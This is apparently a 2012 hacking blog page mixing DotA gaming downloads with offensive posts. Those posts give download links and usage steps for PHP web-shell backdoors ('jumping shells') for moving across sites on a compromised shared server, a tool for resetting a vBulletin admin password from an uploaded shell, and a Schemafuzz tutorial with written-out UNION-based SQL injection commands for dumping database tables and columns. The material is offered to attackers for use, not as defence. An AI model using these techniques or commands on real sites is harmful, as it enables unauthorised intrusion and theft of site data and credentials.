Recent Post

Flag Counter

Saturday, November 24, 2012

Vbulletin Admin Password Changer Tool

Vbulletin Admin Changer Tool
Vbulletin Admin Changer Tool


This tool is named Vbulletin Admin password Changer Tool for Change administrator vbulletin password. You can upload this Vbulletin Admin Password Changer Tool from your shell.and run it.. Just fill the  name , username and password of database which configured in config.php. Password default of the admin is 121098. You can edit yourself the password that consist salt.

Let's Download / see source code Vbulletin Admin Password Changer Tool 

Here is Link for Vbulletin Admin Changer Tool

Search Term :

  • password vbulletin
  • vbulletin reset admin password
  • password powered by vbulletin

WarKey++ 6.2 English (Dota Warkey - WarCraft3 Change HotKey)

WarKey++ 6.2 English (Dota Warkey-WarCraft3 Change HotKey)

WarKey++ 6.2 English Or Warkey Download


Screenshot of  WarKey++ 6.2 English Or Warkey Download
Warkey++ 6.2 English Download

How to use WarKey++ 6.2 English Or Warkey Download?


Download Warkey++ / Warkey  Dota Warkey-WarCraft3 Change HotKey

Download Here

Download and extract Warkey++ / Warkey  Dota Warkey-WarCraft3 Change HotKey

Search Terms:


  • warkey
  • download dota warkey
  • download warkey
  • warkey dota
  • warkey dota utilities
  • warkey 6.3
  • warkey 5.1
  • warkey download
  • warkey 6.2 download
  • warkey 6.2 zip
  • dl warkey
  • dota utilities warkey
  • download warkey 5.1
  • warkey for dota
  • warkey utilities
  • warkey 6.2 english
  • warkey inventory
  • warkey download dota
  • latest warkey
  • warkey garena
  • warkey dl
  • warkey windows 7
  • warkey downloads
  • warkey 5.1 download
  • garena warkey download


Friday, November 23, 2012

Dota 6.76c Map – Official DotA 6.76c Download & Changelog



Dota 6.76c Map – Official DotA 6.76c Download & Changelog
Dota 6.76c Map – Official DotA 6.76c Download & Changelog


Dota 6.76c Map – Official DotA 6.76c Download & Changelog - Actually This Dota 6.76c Map has been released by Official Dota from getdota.com in 2012-10-2, but its ok, no problem just want to share about  Dota 6.76c Map – Official DotA 6.76c Download & Changelog into my blog. 

DotA 6.76c Changelogs 



Dota 6.76c Map – Official DotA 6.76c Download & Changelog
Dota 6.76c Map – Official DotA 6.76c Download & Changelog


Latest Map: 6.76c



Language:English
Date:2012-10-28
MD5:1fcd98dd163b36af56c55b0644db5a1f
Changelog:View Details

DotA v6.76c.w3x (mirror 1)
DotA v6.76c.w3x (mirror 2)

Dota 6.76c is fix patch at the moment,see next whats new on Dota 6.77


Search Terms:

  • dota map 6.67c
  • dota 6.67c download

Wednesday, November 21, 2012

Colection Jumping shell / Server Jumping Sites Domain

After you put the shell on a site such as using the way sql injection techniques, Local file inclusion or Remote File Inclusion, Then You want to read another config in it's server access with  Shell Jumping / PHP script which might be readable in / public / html. So after you get access to readable sites on the server you can read or jump to the config file and connect to mysql on localhost.

I will share PHP Script / Backdoor that includes Jumping Site Feature. This is aimed at jumping shell.

1. Server Jumping  Finder Version 3.0


Shell Jumping / Server Jumping  Finder Version 3.0
Server Jumping  Finder Version 3.0
 
Download Server Jumping  Finder Version 3.0

Download Server Jumping  Finder Version 3.0 or Shell Jumping
Download Server Jumping  Finder Version 3.0
  • Upload the file via Shell
  • Extract file using command unzip jump.zip
  • then run it in URL http://site.com/jump.php
 2. Simple Php Jumping Shell Script


Simple Shell Jumping Jumping Shell
Simple Shell Jumping
  
Download Simple Shell Jumping / Jumping Shell

Download Simple Shell Jumping
  • Upload the file via Shell
  • Extract file using command unzip jumping.zip
  • then run it in URL http://site.com/jump.php 
 3. b3c4k Lompat V.2.0 - StealHealth

b3c4k Lompat V.2.0 - StealHealth
b3c4k Lompat V.2.0 - StealHealth
Download  b3c4k Lompat V.2.0 - StealHealth

Download  b3c4k Lompat V.2.0 - StealHealth
Download  b3c4k Lompat V.2.0 - StealHealth
  • Upload the file via Shell
  • Run this shell in http://site.com/b3c4k.php
  • Click On the Tab "Kamar Sebelah"
4.  b374k mini's claimed coded Newbie3viLc063s shell LOL ! (Credit: DevilsCafe)

 b374k mini Shell Jumping
b374k mini




 Download  b374k mini
 Download  b374k mini Shell Jumping
 Download  b374k mini


  • Upload the file via Shell
  • Run this shell in http://site.com/b374k.php
  • Click On the Tab "Readable"
After you found readable /public/html or read config file with Jumping shell / Shell jumping, Just put the path in view folder in your shell and Go!

Search Terms:

  • jumping shell

Wednesday, November 14, 2012

[Tut] Run Schemafuzz.py Database Dump Tool

Now, Many tool hacking is easy to run Like Havij for database dump. But A person says that its tool for child 3 years old. Hahaha. Back to Schemafuzz, This tool quiet old named Schemafuzz that coded  by Darkc0de with phyton language. But Its still usefull to help to pentest website that buggy with SQL injection. Let's Download And See tutorial for command of Schemafuzz.py

Requirement :
1.Phyton  Download Here For windows

Here is preview 

Schemafuzz Priview

How it runs?

1.Finding range column 

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1" --findcol


2.Database name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dbs

 

3.Table and column name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --schema -D databasename

4.Dump it

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dump -D databasename -T tablename -C columnname,Columnname2


Here is Link to download Schemafuzz.py

Download Schemafuzz 

Mirror

 
Download Schemafuzz (From PasteBin)

Search Terms :
  • Download Schemafuzz.py